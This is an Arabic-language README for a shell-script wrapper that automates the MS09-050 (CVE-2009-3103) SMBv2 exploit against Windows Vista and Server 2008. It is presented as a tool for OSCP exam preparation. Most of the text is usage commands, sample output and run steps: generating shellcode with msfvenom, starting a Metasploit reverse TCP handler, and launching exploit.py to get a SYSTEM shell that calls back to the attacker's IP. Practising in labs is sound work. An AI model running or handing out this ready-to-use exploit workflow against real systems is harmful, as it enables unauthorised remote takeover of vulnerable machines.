
أداة استغلال آلية لـ MS09-050 (CVE-2009-3103) تستهدف SMBv2 على ويندوز فيستا/سيرفر 2008. تُولد شيلكود، وتُبني الاستغلال، وتُنشئ معالج Metasploit للوصول إلى غلاف SYSTEM.
إعداد خط واحد لاستغلال MS09-050 (CVE-2009-3103). لا تعقيد، لا تنقيح، يعمل فقط.
معظم نصوص MS09-050 المنتشرة تتطلب حقن شيلكود يدوي، تواجه مشاكل توقيت مع المعالجات، أو لا تعمل ببساطة. هذا المغلف:
بُني لتحضير OSCP حيث الوقت مهم.
msfvenommsfconsolepython2rpcclient (عادة ما يكون مثبتاً مسبقاً)./ms09_050.sh <TARGET_IP> <YOUR_IP> [PORT]
./ms09_050.sh 192.168.233.40 192.168.45.232 443
Output:
[*] Target: 192.168.233.40 | LHOST: 192.168.45.232 | LPORT: 443
[*] Generating shellcode...
[+] Files created:
- exploit.py
- handler.rc
=== RUN ===
Terminal 1: msfconsole -q -r handler.rc
Terminal 2: python2 exploit.py 192.168.233.40
الطرفية 1 - بدء المعالج:
msfconsole -q -r handler.rc
انتظر: Started reverse TCP handler on ...
الطرفية 2 - تشغيل الاستغلال:
python2 exploit.py 192.168.233.40
تحقق من الطرفية 1 للحصول على الشل.
windows/shell/reverse_tcp) - تعمل بشكل موثوق مع الممرر في هذا الاستغلالالاستغلال الأصلي مبني على إثبات المفهوم الخاص بـ ohnozzy's MS09-050.
MIT - افعل ما تشاء، فقط لا تكن شريراً.